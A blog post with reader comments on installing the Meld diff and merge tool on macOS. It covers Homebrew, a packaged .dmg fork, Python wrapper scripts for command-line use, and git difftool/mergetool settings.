GPIO operation and Flash memory I have a plans to use Omega as replacement for MCU that have to control one signal to monitor whether it is on or have meander form. As there is no library for Python that support falling edge detection there should be check made in a double frequency of a pulses. As GPIO information is written to the file and stored in flash memory, I would like to estimate how long Omega's memory will operate before become damaged (did not find that there is FRAM memory used) if GPIO will be updated 10 times per second ? Where I am wrong in my meaning or is it true that I could not use Omega as MCU replacement? Actually, I expected a lot of comments stated that I am not right. Does silence means that, when I saw a code in GPIOhelper class I was right: def getPin(self, pin): # Set direction as in fd = open(self.pinDirectionPath.replace("$", str(pin)), 'w') fd.write("in") fd.close() # Get value ... I did understand that every time when GPIO ir read, file will be overwritten. So in case I would read the state 10 times per second, then after (100000 cycles) or after 10 000 seconds flash memory will be damaged. Is there a case to get somehow info about GPIO state and set the GPIO output by using RAM? Or I am wrong as this file is not actually a file but a register? Not familiar with linux enough. - Lazar Demin administrators Hi @Pux So reading and setting the GPIOs through the file system is done through the sysfs interface, which is essentially a virtual filesystem provided by the Linux kernel to bring info on any connected hardware into userspace. The files in /sys/class/gpiothat are read by the GPIOhelper you mentioned above are actually virtual files, my best guess is that the virtual file is only updated by the kernel when you attempt to read from it. AND, it's most likely not written to the flash memory at all. In short, you should not have any problems with your flash memory getting damaged when using the GPIOs, even if it's updating 10 times a second. :) Thank You for the answer. It is clear now that Onion is the right device to make controller in short time. - Lazar Demin administrators
http://community.onion.io/topic/662/gpio-operation-and-flash-memory
CC-MAIN-2018-22
refinedweb
396
68.91
I’ve been reading up on Kubernetes a bit recently and Jesse Hertz pointed me at an interesting item around Kubernetes security that illustrates common problem of insecure defaults, so I thought it might be worth a post walking through the issue, mainly as a way for me to improve my Kubernetes knowledge but also could be useful for others who are deploying it. td;dr if you can get access to the kubelet API port you can control the whole cluster and default configurations of Kubernetes are likely to make this possible, so be careful when setting up your clusters. So the issue I wanted to look at is this kubelet exploit. Basically the kubelet is the service which runs on Kubernetes nodes and manages things like the docker installation on that node amongst other things. It receives commands from the API server which co-ordinates the actions of the nodes in the cluster. The security problem lies in the fact that by default the kubelet service listens on a TCP/IP port with no authentication or authorization control, so anyone who can reach that port at a network level can execute kubelet commands just by issuing HTTP requests to the service. This means that an attacker who can get access to that port can basically take over the whole cluster pretty easily. The kubernetes team are well aware of this issue but a fix isn’t planned until Kubernetes 1.5 There’s also a workaround mentioned on the kubelet-exploit page which involves binding the kubelet to 127.0.0.1 and then connecting it to the kube-apiserver via SSH tunnels. To explore this problem I followed the kubeadm guide from the kubernetes site. Kubeadm is a tool which allows for clusters to be easily set up and appears to somewhat be modeled after some of the docker swarm commands. I followed the tutorial through to the point where I had a working cluster, taking all the defaults. Then I deployed a container with some tools into the cluster, the scenario we’re testing is that an attacker has gained access to a container in the cluster, and we’ll see what they can do to take control of the cluster with only that access kubectl run -i -t badcontainer --image=kalilinux/kali-linux-docker which after a while for the image to download gives us a bash shell running in a container on the cluster. So now we can scan round to see whether the port we’re looking for is available. First add some tools to our build apt update apt install nmap curl Then scan the network. In this case my main network where the nodes are installed is 192.168.41.0/24 nmap -sT -v -n -p10250 192.168.41.0/24 from that we get back a bunch of filtered ports but also three open ones which are the IP addresses of my kubernetes nodes. Nmap scan report for 192.168.41.201 Host is up (0.00013s latency). PORT STATE SERVICE 10250/tcp open unknown Nmap scan report for 192.168.41.232 Host is up (0.000065s latency). PORT STATE SERVICE 10250/tcp open unknown Nmap scan report for 192.168.41.233 Host is up (0.00020s latency). PORT STATE SERVICE 10250/tcp open unknown Now we can use some of the kubectl commands mentioned in the exploit to start getting more access to the cluster. First up lets enumerate our containers curl -sk | python -mjson.tool This returns a list of the pods running on the node in JSON form, and also the images they’re based on. The most interesting one here is { "metadata": { "creationTimestamp": null, "name": "kube-apiserver-kube", "namespace": "kube-system", "uid": "0446d05fb9406214210e8d29397f8bf2" }, "spec": { "containers": [ { "image": "gcr.io/google_containers/kube-apiserver-amd64:v1.4.0", "name": "kube-apiserver", "resources": {} }, { "image": "gcr.io/google_containers/pause-amd64:3.0", "name": "POD", "resources": {} } ] }, it’s running the kube-apiserver image, so that’ll be our API server. As I mentioned earlier the API server is basically the heart of the cluster, so access to it provides a lot of control over the cluster itself. curl -k -XPOST "" -d "cmd=ls -la /" lists the files in the root directory of that container and if we run curl -k -XPOST "" -d "cmd=whoami" We get back the answer that every pentester likes to see which is root ! So at this point, that’s pretty bad news for the cluster owner. A rogue container should not be able to execute privileged commands on the API server of the cluster. So the next step in the attack would be to take over the cluster, for which the easiest way is likely to be getting control of the API server, as that lets us create new containers amongst other things. if we do curl -k -XPOST "" -d "cmd=ps -ef" we can see the process list for the API server which handily provides the path of the token file that Kubernetes uses to authenticate access to the API PID USER TIME COMMAND 1 root 2:29 /usr/local/bin/kube-apiserver --v=4 --insecure-bind-address=127.0.0.1 --etcd-servers= --admission-control=NamespaceLifecycle,LimitRanger,ServiceAccount,PersistentVolumeLabel,DefaultStorageClass,ResourceQuota --service-cluster-ip-range=100.64.0.0/12 --service-account-key-file=/etc/kubernetes/pki/apiserver-key.pem --client-ca-file=/etc/kubernetes/pki/ca.pem --tls-cert-file=/etc/kubernetes/pki/apiserver.pem --tls-private-key-file=/etc/kubernetes/pki/apiserver-key.pem --token-auth-file=/etc/kubernetes/pki/tokens.csv --secure-port=443 --allow-privileged --etcd-servers= here we can see that it’s /etc/kubernetes/pki/tokens.csv so then we can just cat out that file curl -k -XPOST "" -d "cmd=cat /etc/kubernetes/pki/tokens.csv" and we get the token which is the first field listed d65ba5f070e714ab,kubeadm-node-csr,9738242e-8681-11e6-b5b4-000c29d33879,system:kubelet-bootstrap Now we can communicate directly with the Kubernetes API like so curl -k -X GET -H "Authorization: Bearer d65ba5f070e714ab" this gives us easier control of the cluster than we had from just running individual commands on it. We could persist with the HTTP API but TBH I find it easier to use kubectl, so we can just download that and point it at our cluster with our newly acquired token. wget chmod +x kubectl ./kubectl config set-cluster test --server= ./kubectl config set-credentials cluster-admin --token=d65ba5f070e714ab From here, the next step it to look at getting access to the underlying nodes. This can be achieved by mapping in a volume from the node to a container that we run. so if we create a file called test-pod.yml apiVersion: v1 kind: Pod metadata: name: test-pd spec: containers: - image: nginx name: test-container volumeMounts: - mountPath: /test-pd name: test-volume volumes: - name: test-volume hostPath: # directory location on host path: /etc and start it up with ./kubectl create -f test-pod.yml we can then run a command to cat out the /etc/shadow file of the underlying node ./kubectl exec test-pd -c test-container cat /test-pd/shadow From there it’s just a bit of password cracking needed and we get shell access to the underlying node. So from that we can see that there’s definitely something to think about if you’re going to run a Kubernetes cluster in production, i.e. protect access to the kubectl API port…
https://raesene.github.io/blog/2016/10/08/Kubernetes-From-Container-To-Cluster/
CC-MAIN-2018-51
refinedweb
1,251
59.43
WebServiceAttribute.Name Property Gets or sets the name of the XML Web service. Assembly: System.Web.Services (in System.Web.Services.dll) The Service Description is generated when a user navigates to the URL for the XML Web service and supplies a query string of ?WSDL. Within the Service Description, the Name property identifies the local part of the XML qualified name for the XML Web service. The Name property is also used to display the name of the XML Web service on the Service help page. The Service help page is displayed when a prospective consumer navigates to the.asmx page for the XML Web service without specifying an XML Web service method name and its parameters. An XML qualified name is used to disambiguate elements with the same name with an XML document. An XML qualified name consists of the following two parts separated by a colon: namespace or a prefix associated with a namespace and local part. The namespace consists of a URI reference and for the purposes of the Service Description, is the value of the Namespace property. In general, a prefix, which acts like an alias to an URI, is associated with the namespace, so that all subsequent XML qualified names using the namespace can use the shortened prefix. The local part is a string beginning with a letter or underscore containing no spaces. Therefore, the XML qualified name identifying a XML Web service in the Service Description is in the following format: For more information on XML qualified names, see. Available since 1.1
https://msdn.microsoft.com/en-us/library/system.web.services.webserviceattribute.name.aspx
CC-MAIN-2016-50
refinedweb
260
53.21
TouchableWithoutFeedback If you're looking for a more extensive and future-proof way to handle touch-based input, check out the Pressable API. Do not use unless you have a very good reason. All elements that respond to press should have a visual feedback when touched. TouchableWithoutFeedback supports only one child. If you wish to have several child components, wrap them in a View. Importantly, TouchableWithoutFeedback works by cloning its child and applying responder props to it. It is therefore required that any intermediary components pass through those props to the underlying React Native component. Usage Pattern function MyComponent(props) { return ( <View {...props} style={{ flex: 1, backgroundColor: '#fff' }}> <Text>My Component</Text> </View> ); } <TouchableWithoutFeedback onPress={() => alert('Pressed!')}> <MyComponent /> </TouchableWithoutFeedback>; Example Reference Props accessibilityIgnoresInvertColors accessible When true, indicates that the view is an accessibility element. By default, all the touchable elements are accessible. accessibilityLabel Overrides the text that's read by the screen reader when the user interacts with the element. By default, the label is constructed by traversing all the children and accumulating all the Text nodes separated by space. accessibilityHint An accessibility hint helps users understand what will happen when they perform an action on the accessibility element when that result is not clear from the accessibility label.. delayLongPress Duration (in milliseconds) from onPressIn before onLongPress is called. delayPressIn Duration (in milliseconds), from the start of the touch, before onPressIn is called. delayPressOut Duration (in milliseconds), from the release of the touch, before onPressOut is called. disabled If true, disable all interactions for this component. hitSlop This defines how far your touch can start away from the button. This is added to pressRetentionOffset when moving off of the button. The touch area never extends past the parent view bounds and the Z-index of sibling views always takes precedence if a touch hits two overlapping views. onBlur Invoked when the item loses focus. onFocus Invoked when the item receives focus. onLayout Invoked on mount and on layout changes. onLongPress Called if the time after onPressIn lasts longer than 370 milliseconds. This time period can be customized with delayLongPress. onPress Called when the touch is released, but not if cancelled (e.g. by a scroll that steals the responder lock). The first function argument is an event in form of PressEvent. onPressIn Called as soon as the touchable element is pressed and invoked even before onPress. This can be useful when making network requests. The first function argument is an event in form of PressEvent. onPressOut Called as soon as the touch is released even before onPress. The first function argument is an event in form of PressE. nativeID testID Used to locate this view in end-to-end tests. touchSoundDisabled Android If true, doesn't play a system sound on touch.
http://reactnative.dev/docs/0.66/touchablewithoutfeedback
CC-MAIN-2022-21
refinedweb
462
50.33
I don’t know about you, but the main thing I’m interested in on any new mobile development platform for some reason, is LISTS. I think I’m so fixated on lists is because of the way the iPhone so successfully introduced the paradigm of list based navigation. Everything can be done in a series of lists (ok not really, but they are crucial to many apps!). Naturally then, the first thing I sought out to do on MonoDroid was to create a list. Easy, piece of cake… If you want to create a boring old list with a single line of text for each item. This is no doubt, an important part of every developer’s Hello World development phase, but it doesn’t take long before you’re craving images, several text elements, and possibly even some checkboxes and/or buttons (easy there tiger). For every ListView in Android, there is a prince charming ListView Adapter to save the day. The most basic of examples which you’ve no doubt seen involve an ArrayAdapter of some sort, with the default Android.R.Layout.SimpleListItem or whatever it is called. BOOORING. What we need to do to make something exciting is create our own custom ListView Adapter. Now, you could use a SimpleAdapter to map fields to certain resource id’s of a layout, but if you look at a java example of this, ‘Simple’ quickly becomes a relative term. What I like to do is create my own adapter deriving from the BaseAdapter class (how fitting). Here’s some code for my custom list adapter (explanation to follow): using System; using System.Collections.Generic; using System.Linq; using System.Text; using Android.App; using Android.Content; using Android.OS; using Android.Runtime; using Android.Views; using Android.Widget; using Android.Graphics.Drawables; namespace MonoDroid.CustomList { public class CustomListAdapter : BaseAdapter { Activity context; public List<Animal> items; public CustomListAdapter(Activity context) //We need a context to inflate our row view from : base() { this.context = context; //For demo purposes we hard code some data here this.items = new List<Animal>() { new Animal() { Name = "Elephant", Description = "Big and Gray, but what the hey", Image = Resource.drawable.elephant }, new Animal() { Name = "Chinchilla", Description = "Little people of the andes", Image = Resource.drawable.chinchilla }, new Animal() { Name = "Lion", Description = "Cowardly lion, anyone?", Image = Resource.drawable.lion }, new Animal() { Name = "Skunk", Description = "Ello, baby. I am ze locksmith of love, no?", Image = Resource.drawable.skunk }, new Animal() { Name = "Rhino", Description = "Most live to about 60, pretty old eh?", Image = Resource.drawable.rhino }, new Animal() { Name = "Zebra", Description = "Stripes maybe not so great for hiding", Image = Resource.drawable.zebra }, new Animal() { Name = "Squirrel", Description = "Nuts nuts, where's my nuts?!", Image = Resource.drawable.squirrel }, new Animal() { Name = "Walrus", Description = "I am he as you are he as you are me", Image = Resource.drawable.walrus }, new Animal() { Name = "Giraffe", Description = "Bigger than your ford pinto", Image = Resource.drawable.giraffe }, new Animal() { Name = "Chicken", Description = "I'll take 2 eggs over easy", Image = Resource.drawable.chicken }, new Animal() { Name = "Duck", Description = "He's all quacked up", Image = Resource.drawable.duck }, new Animal() { Name = "Hawk", Description = "He needs to be on a t-shirt", Image = Resource.drawable.hawk }, new Animal() { Name = "Lobster", Description = "We were at the beach...", Image = Resource.drawable.lobster }, new Animal() { Name = "Pig", Description = "Babe, Orson, Piglet, whatever", Image = Resource.drawable.pig }, new Animal() { Name = "Rabbit", Description = "Thumper is the best rabbit name ever", Image = Resource.drawable.rabbit }, new Animal() { Name = "Turtle", Description = "Slow and steady wins the race", Image = Resource.drawable.turtle }, }; } public override int Count { get { return items.Count; } } public override Java.Lang.Object GetItem(int position) { return position; } public override long GetItemId(int position) { return position; } public override View GetView(int position, View convertView, ViewGroup parent) { //Get our object for this position var item = items[position]; //Try to reuse convertView if it's not null, otherwise inflate it from our item layout // This gives us some performance gains by not always inflating a new view // This will sound familiar to MonoTouch developers with UITableViewCell.DequeueReusableCell() var view = (convertView ?? context.LayoutInflater.Inflate( Resource.layout.customlistitem, parent, false)) as LinearLayout; //Find references to each subview in the list item's view var imageItem = view.FindViewById(Resource.id.imageItem) as ImageView; var textTop = view.FindViewById(Resource.id.textTop) as TextView; var textBottom = view.FindViewById(Resource.id.textBottom) as TextView; //Assign this item's values to the various subviews imageItem.SetImageResource(item.Image); textTop.SetText(item.Name, TextView.BufferType.Normal); textBottom.SetText(item.Description, TextView.BufferType.Normal); //Finally return the view return view; } public Animal GetItemAtPosition(int position) { return items[position]; } } } Oh, and here’s the Animal class if you’re curious: namespace MonoDroid.CustomList { public class Animal { public string Name { get; set; } public string Description { get; set; } public int Image { get; set; } } } Now for the sake of the demo, I create my own data inside the adapter, and of course nothing is stopping you from getting that data from a webservice, or somewhere more fashionable. The first thing to note is that I’m requiring an Activity object in the ctor. This really is only used to get the LayoutInflator for the given Activity so that we can inflate our row’s View later on, but it is important to have it. Next thing of interest is the overrides. All we really need to override is the Count property, GetItem method, GetItemId method, and GetView method. The last method ( GetItemAtPosition) is my own addition so that I can read out the object for a given position elsewhere in the project (in this case, when a ListView.ItemClicked event is fired). Count is easy, just return your object list’s count (duh). GetItem and GetItemId I’m still not convinced are necessary, but I override them anyways and just return the position in each case. The only significance I know of so far with these properties is in some ListView events, the item Id is passed as an event arg. However, in these same events, we also get the item’s position, which is why I have the GetItemAtPosition method, so I can retrieve the relevant object for the event. I’d love to hear from anyone who knows more about why I might want to pay more attention to the GetItem and GetItemId methods. GetView is where the magic happens. Basically, I get the item for the given position first. Next, I determine if the convertView parameter is null or not, and inflate my CustomListItem’s layout into a usable View ( LinearLayout to be specific). This is basically a way for us to reuse resources. Anyone familiar with MonoTouch and the Reusable UITableViewCell will feel right at home here. We could inflate the resource every time, but that would waste unnecessary resources. So, best practice here is to always reuse if the convertView is not null. Now then, with my LinearLayout instance, I can locate all of the views within that I want to assign information to, for the given row. As you can see in this case, I have an ImageView, and two TextView’s. Here is what the layout xml looks like for my custom list item: <?xml version="1.0" encoding="utf-8"?> <LinearLayout xmlns: <ImageView android: <LinearLayout android: <TextView android: <TextView android: </LinearLayout> </LinearLayout> Once I have found references to these, I can set their text and image. Finally, I can return the LinearLayout View that I’ve been working on for this row. That wasn’t so hard, was it? Last, but not least, we need to actually deal with our Activity that holds the ListView. Up until now we had just created the adapter that our ListView was going to use. Now we need to actually hook an adapta’ up. Here’s what my Activity code looks like: using System; using Android.App; using Android.Content; using Android.Runtime; using Android.Views; using Android.Widget; using Android.OS; namespace MonoDroid.CustomList { [Activity(Label = "1 CustomList", MainLauncher = true)] public class CustomList : Activity { CustomListAdapter listAdapter; public CustomList(IntPtr handle) : base(handle) { } protected override void OnCreate(Bundle bundle) { base.OnCreate(bundle); //Set the Activity's view to our list layout SetContentView(Resource.layout.customlist); //Create our adapter listAdapter = new CustomListAdapter(this); //Find the listview reference var listView = FindViewById<ListView>(Resource.id.listView); //Hook up our adapter to our ListView listView.Adapter = listAdapter; //Wire up the click event listView.ItemClick += new EventHandler<ItemEventArgs>(listView_ItemClick); } void listView_ItemClick(object sender, ItemEventArgs e) { //Get our item from the list adapter var item = this.listAdapter.GetItemAtPosition(e.Position); //Make a toast with the item name just to show it was clicked Toast.MakeText(this, item.Name + " Clicked!", ToastLength.Short).Show(); } } } Here’s the layout xml behind this activity: <?xml version="1.0" encoding="utf-8"?> <LinearLayout android: <ListView android: </LinearLayout> So you can see in my Activity’s OnCreate, I’m calling the base method (important), and then setting the activity’s content view to the layout xml that I showed you above. I’m also creating an instance of the CustomListAdapter I made earlier, and finding a reference to my ListView, so that I can set my ListView’s .Adapter property to the instance of the CustomListAdapter. As a bonus, I register the ItemClick event of my ListView, and in it, retrieve the item for the given position, from my CustomListAdapter, using the method I added to the adapter ( GetItemPositionAt). I then display a Toast with the name of the Animal clicked. Hopefully this little tutorial enlightens you on how to make some fancy lists (not those boring default ones). I’ve also made the source code of the entire project available:
https://redth.codes/monodroid-custom-listadapter-for-your-listview/
CC-MAIN-2021-21
refinedweb
1,615
56.96
You can subscribe to this list here. Showing 1 results of 1 I have a script that runs fine from the command line, but when I run my setup.py script and then try to execute the .exe it crashes as it can't import the first module. I have a setup script that looks something like this; from distutils.core import setup import py2exe import sys if len(sys.argv) == 1: sys.argv.append('py2exe') setup(console = [{"script":"myprogram.py", "dest_base": "myprogram_test", "icon_resources":[(0,"myprogram.ico")] ], name = "myprogram_test", zipfile = None, options = { "py2exe": {"ignores" : ['mx.DateTime', 'wx.BitmapFromImage'], "compressed" : 1, "dll_excludes": ["w9xpopen.exe"], "bundle_files": 3 } ) The contents of myprogram.py look like this; import sys import os from myobjs import objects as mobj app = mobj.MyApplication() app.MainLoop() myobjs is a directory and has a __init__.py that is empty. I can run "myprogram.py" from the command line and every thing works fine. When I run as an exe, myprogram.exe always fails on the first import statement of the myobjs.objects module, regardless of which module is in this position. (ie. if 'traceback' is the first module, then it will fail on the statement "import traceback") I checked the .\\build\bdist.win32\winexe\collect-2.5 directory, and the module where the failed import attempt occurred has been copied to this directory. If I change the setup script to be zipfile = "myprogram.zip" and once generated, if I open this file using winzip, I can see the *.pyc file inside. (ie. the "traceback.pyc" file is in the zip) So ... For some reason, when "myprogram" runs as an exe, it doesn't seem to be able to import modules from the executable or the zip file. I can work around this if I define each in the myprogram.py each module that is used in any submodule, the the .exe works fine -- however, that becomes a maintenance headache with future version. It appears to me that the module lookup mechanism in the generated .exe somehow gets mangled in the exe. I have spent several hour building "test" environment to try and reproduce the behaviour, and unfortunately, the simplified test .py works perfectly as both a .py and .exe :-( So I know the problem is in my code some where, but I haven't got a clue where to start looking. Any help, assistance, tips would be greatly appreciated. g.
http://sourceforge.net/p/py2exe/mailman/py2exe-users/?style=flat&viewmonth=200803&viewday=16
CC-MAIN-2015-27
refinedweb
401
69.58
This is a brief return to the topic of Irrational Sunflowers. The sunflower associated with a real number is the set of points with polar coordinates and , . A sunflower reduces to equally spaced rays if and only if is a rational number written in lowest terms as . Here is the sunflower of of size . Seven rays emanate from the center because , then they become spirals, and spirals rearrange themselves into 113 rays because . Counting these rays is boring, so here is a way to do this automatically with Python (+NumPy as np): a = np.pi n = 5000 x = np.mod(a*np.arange(n, 2*n), 1) np.sum(np.diff(np.sort(x)) > 1/n) This code computes the polar angles of sunflower points indexed , sorts them and counts the relatively large gaps between the sorted values. These correspond to the gaps between sunflower rays, except that one of the gaps gets lost when the circle is cut and straightened onto the interval . So the program output (112) means there are 113 rays. Here is the same sunflower with the points alternatively colored red and blue. The colors blur into purple when the rational approximation pattern is strong. But they are clearly seen in the transitional period from 22/7 approximation to 355/113. - How many points would we need to see the next rational approximation after 355/113? - What will that approximation be? Yes, 22/7 and 355/113 and among the convergent of the continued fraction of . But so is 333/106 which I do not see in the sunflower. Are some convergents better than others? Finally, the code I used to plot sunflowers. import numpy as np import matplotlib.pyplot as plt a = np.pi k = np.arange(10000) r = np.sqrt(k) t = a*2*np.pi*k plt.axes().set_aspect('equal') plt.plot(r*np.cos(t), r*np.sin(t), '.') plt.show()
https://calculus7.org/2020/03/14/pi-and-python-how-22-7-morphs-into-355-113/
CC-MAIN-2021-04
refinedweb
319
68.67
The primary difference that exists between these two programming languages is that C is a procedural language for programming and fails to support objects and classes. On the other hand, C++ is a combination of object-oriented and procedural programming languages. In other words, it is oft referred to as a hybrid language as it is a superset of C and supports more features. Through this article, we aim to inform you about what is C++ language, what is C language, the fundamental difference between C and C++, and so forth. Read on to know more. C and C++ Difference What is C Language? C programming language can be defined as a middle-level language. It was the brainchild of Dennis Ritchie and was first developed in 1972 at Bell Labs. As C successfully combines the features and capabilities of a high-level language and low-level language, it can be categorised as a middle-level language. C language is a classical high-level type language used for programmers to develop portable applications and firmware. Though C was first developed with the intent of writing system software, it has transformed itself as an appropriate language for the development of firmware systems. Code Example of C Program : #include<stdio.h> int main() { int n1=10; int n2=25; int add=n1+n2; printf("Sum = %i", add); } Output : Sum = 35 Features of C Language - This robust language comes packaged as a rich set of operators and built-in functions that are equipped for the development of any complex program. - The C compiler is a combination of the capabilities of a high-level language and assembly language. - The programs scripted in C are quick and efficient courtesy of the presence of dominant operators and different data types. - Highly portable, the programs written in C language can be run on different machines with or without any modifications. - C programs can extend themselves. - The programs written in C language are a collection of functions that are ably supported by the C library. Programmers can also create new features to add to the C library. Today, C is the most widely used programming language in context to the development of operating systems and embedded systems. What is C++ Language? C++ is a popular computer programming language that combines the features of Simula67 and C programming language. Simula67 is among the first object-oriented programming languages. Bjarne Stroustrup developed C++ in 1979. C++ introduced the concept of objects and classes. This intermediate or middle-level programing language is a smart combination of the features of high and low-level programming languages. Initially, C++ was referred to as "C with classes" because it showcased various features of C language. In other words, when C language gains the property of inheritance with classes, then it is known as C++ Code Example of C++ Program: #include <iostream> using namespace std; int main() { int a=10; int b=25; int sum=x+y; cout<<"Sum = " << z; } Output : Sum = 35 Features of C++ language - It is a compiled language that is equipped to be implemented on various platforms. - C++ is an object-oriented program that also supports low-level memory manipulations. - The primary feature of C++ is that it is a collection of various predefined classes; they are data types capable of multiple time use. - C++ language facilitates the declaration of different user-defined classes. - The newly declared classes can accommodate member functions for the implementation of essential functionality. - Multiple objects of specific classes can be defined for the creation of various functions inside the class. Overall, C++ language is used by modern-day developers for its significant features of encapsulation, abstraction, polymorphism, etc. Key Difference between C and C++ - C is a middle-level coding language developed at Bell Lab by Dennis Ritchie in 1972. - C++ computer coding language was developed in 1980 by Bjarne Stroustrup. - C is well-suited for the development of portable applications and firmware as a high-level classical coding language. - The concepts related to objects and classes were first introduced by C++ language; it is an effective combination of low-level and high-level languages alike. - C is a procedure-oriented programming language. - C++ is a useful object-oriented programming language. - C language offers support for pointers only while C++ supports pointers and references alike. - Polymorphism is an essential property of C++ language which is not present with C language. Conclusion: We hope that you have attained a good idea about the basics of C and C++ languages to take care of your coding. The pointers related to C vs C++ and the above-mentioned comparative features will guide you forward to enable your cause with both programming languages. In case you have any other points of distinction between C and C++ that we may have missed out, please let us know in the Comments section below.
https://www.stechies.com/differences-between-c-language-c-pp/
CC-MAIN-2020-05
refinedweb
811
54.02
only take a minute to install via one simple command, and you will probably end up installing it at some point anyway. Update 02/15/2019 Here is what I had to do to get it working in 2020. - Download and Install Yousseb fork for Mac. - Create a meld file somewhere on my path, with code from comment by Levsa (pasted bellow) - Make sure the file is still executable sudo chmod a+x ~/bin/meld Improved Script from Levsa: #!/usr/bin/python import sys import os import subprocess MELDPATH = "/Applications/Meld.app" userArgs = [] for arg in sys.argv[1:]: if arg.startswith('--output'): filename = arg.split('=')[1] newArg = '--output=' + os.path.abspath(filename) elif arg.startswith('-'): newArg = arg else: newArg = os.path.abspath(arg) userArgs.append(newArg) argsArray = ['open', '-W', '-a', MELDPATH, '--args'] + userArgs print argsArray p = subprocess.call(argsArray) Old Post: Note: `brew install meld` will probably fail, but the error will show you the proper command to run. In February of 2016 for me that command was `brew install homebrew/gui/meld`, some people report that `brew install homebrew/x11/meld` worked for them. Just read the outputted message carefully. It will probably have to pull in a lot of dependencies so it might take a while, but it should work. For some reason Homebrew did not work for me on my new Mac back in February of 2015, so I had to look for other options (hence the “Without Homebrew, MacPorts, or Think” part in the original title of this article). After some intense Googling, I came across this AWESOME fork of Meld. It is Meld packaged with all of the dependencies into a regular .dmg. Pleae make sure to visit the official project page – Meld for OSX. Note: I am linking to release tagged osx-v1, there have been other releases since then. Some of them did not work for all users, but the latest release (OSX – 3.15.2) suppose to work. You might have to try a few release to find the one that works for you. The author of of that package posts his updates in the comments sometimes, so be on a lookout for that. If all fails I recommend using version osx-v1, since it seems to work for most users. As I said earlier, Meld.dmg “just worked” for me, except that it didn’t work in the command line, and that is where I need it the most. I wrote the following script (in python since you already need it to run meld) and placed it in ~/bin folder (making sure to add ~/bin to my PATH, see bellow). Note: There is a cleaner version posted in the comments that should work with 3 arguments, allowing you to use meld as a merge tool. I have not tested it, but it looks like it should work, and it might be worth your time to try it first. #!/usr/bin/python import sys import os import subprocess if len(sys.argv) > 1: left = os.path.abspath(sys.argv[1]); else: left = "" if len(sys.argv) > 2: right = os.path.abspath(sys.argv[2]); else: right = "" MELDPATH = "/Applications/Meld.app" p = subprocess.call(['open', '-W', '-a', MELDPATH, '--args', left, right]) I then added that folder to my PATH via export PATH=~/bin:$PATH entry in my .bashrc file, to make sure that meld command got picked up in my terminal. You can reload your bash config via . ~/.bashrc or just restart the terminal. Type in meld and it should work. I’ve been using it for a few weeks many months now, and yet to run into any problems. So there you have it, a working Meld on Mac OS X Yosemite, without having to use any 3rd party tools. - Updated February 13, 2016 - Updated homebrew instructions - Updated Meld fork reference instructions I had sporadic behavior on OS X 10.14 Mojave and found these commands fixed my problem. rm -rf ~/.local/share/meld rm -f ~/Library/Preferences/org.gnome.meld.plist rm -rf “~/Library/Saved Application State/org.gnome.meld.savedState/” From issue #70 thanks a lot! Quite a rookie problem but I spent hours thinking why running melddoesn’t run it! daaa, I need to name the script file meld for it work!! Meld can now be installed using: brew install homebrew/gui/meld I was wondering, how can I use meld as a git diff tool? I have this added in my ~/.gitconfigfile Then git difftool -dwill lunch meld. Guys, whenever you could, please test this release: It shouldn’t require a wrapper script any longer. I haven’t had the time to 100% clean the wrapper script, but it seems functional and is based on what you guys have suggested here. You can find the script in /Applications/Meld.app/Contents/MacOS/Meld after you have installed Meld. If you have suggestions or fixes that you’d like to add to it, I’d love to hear from you. Alex, please add a link to the page if you could. Done, thanks for the link back! No, man. Thank you for maintaining this page. It’s been awesome! The feedback on this page has been amazing and I would have honestly stopped at 1.8 (it pretty much fit the bill for what I needed) if it wasn’t for the feedback on your page. As of mid-February, yousseb has released a 3.15.2 version as a .dmg. Installs and runs just fine. Get the latest at: Thanks, I’ve added a link to the latest release with a comment. I just uploaded a new release to github. Please check and let me know if it still breaks. Thanks, I am a bit short on time to re-install it and try it out right now, but I’ve added a link in the note for now, and will try to test it later. I’ve also change the order of comments to make sure that this shows up first. On a new mac, I was able to install meld with brew using: brew install homebrew/x11/meld There is also a native build of meld for os x: I made a version of the mapping, but one that detects options: #!/usr/bin/python import sys import os import subprocess MELDPATH = “/Applications/Meld.app” userArgs = [] for arg in sys.argv[1:]: if arg.startswith(‘–output’): filename = arg.split(‘=’)[1] newArg = ‘–output=’ + filename elif arg.startswith(‘-‘): newArg = arg else: newArg = os.path.abspath(arg) userArgs.append(newArg) argsArray = [‘open’, ‘-W’, ‘-a’, MELDPATH, ‘–args’] + userArgs print argsArray p = subprocess.call(argsArray) Sorry about the formatting, the second line after else: is outside of the else block. With errors fixed: A slightly modified version of this is now part of the wrapper script in release osx-8. Thanks. … which means you can simply create a symlink in usr/local/bin and use it super easily from the command-line, as well as a diff tool: For example, add it to your ~/.gitconfigfile: I am getting the following error after doing as the post says: LSOpenURLsWithRole() failed for the application /Applications/Meld.app with error -10810 Any ideas? Me too! No idea how to solve it. Are you using the alpha version or the latest? latest. The only version I could get to work was the alpha version. Not sure what the later versions fix or add, but the alpha version does everything I need it to do. Thanks for the offer, but alpha turns out to do the same… Sorry – my mistake, it’s not the alpha build that works, but the first build here: Now it works! To be precise, now I had the meld error problem, but fixed it as described in the link above. Thanks a lot! +1 with LSOpenURLsWithRole() failed for the application /Applications/Meld.app with error -10810. I couldn’t get this to work with any but the initial alpha version of Meld. I thought you might like to know there is a simpler way to invoke Meld via mergetool, without the need for any extra scripts: [mergetool “meld”] cmd = open -W -a Meld –args –diff `pwd`/$BASE `pwd`/$LOCAL –diff `pwd`/$BASE `pwd`/$REMOTE –auto-merge `pwd`/$LOCAL `pwd`/$BASE `pwd`/$REMOTE –output `pwd`/$MERGED Note: the pwd should be in backticks to insert the full path. For some reason, open seems to use the context of the application rather than where you open it from. Wow – the backticks didn’t even show up! I wasn’t expecting that. They should look like ‘pwd’ but with backticks, if you know what I mean. In fact scratch that, it’s easier to just do: cmd = open -W -a Meld –args –auto-merge $PWD/$LOCAL $PWD/$BASE $PWD/$REMOTE –output $PWD/$MERGED Ops – didn’t check this thread in a while. I also didn’t notice that you couldn’t report issues on my fork in github. I’ll see how to enable that and get back to you guys in here.. I did test on multiple Macs with Yosemite, but I’d really like this fork to be useful. I hated meld on macports and it’s about the best diff/merge tool I ever used. I’d like to spread it around.. 🙂 Thanks Youssef, Are you on Twitter? I would love to put your handle in the main post. I can also link to a website if you want. Let me know. Alex. I just tried the .dmg version, but alas it does not run for me. I’d love to try and debug the beta, but there doesn’t seem to be a way to make contact with Yousef. I’d actually gotten the MacPorts version of meld running under Quartz without X11 on my Mavericks system, but that was a year ago. It looks like I’m gonna have to refresh my understanding of the lore. Try getting the older version. I think I might have used Yes, the osx-v1 version does work. The later versions just crash. The error I get with osx-v3 is: 9/12/15 11:09:27.898 PM 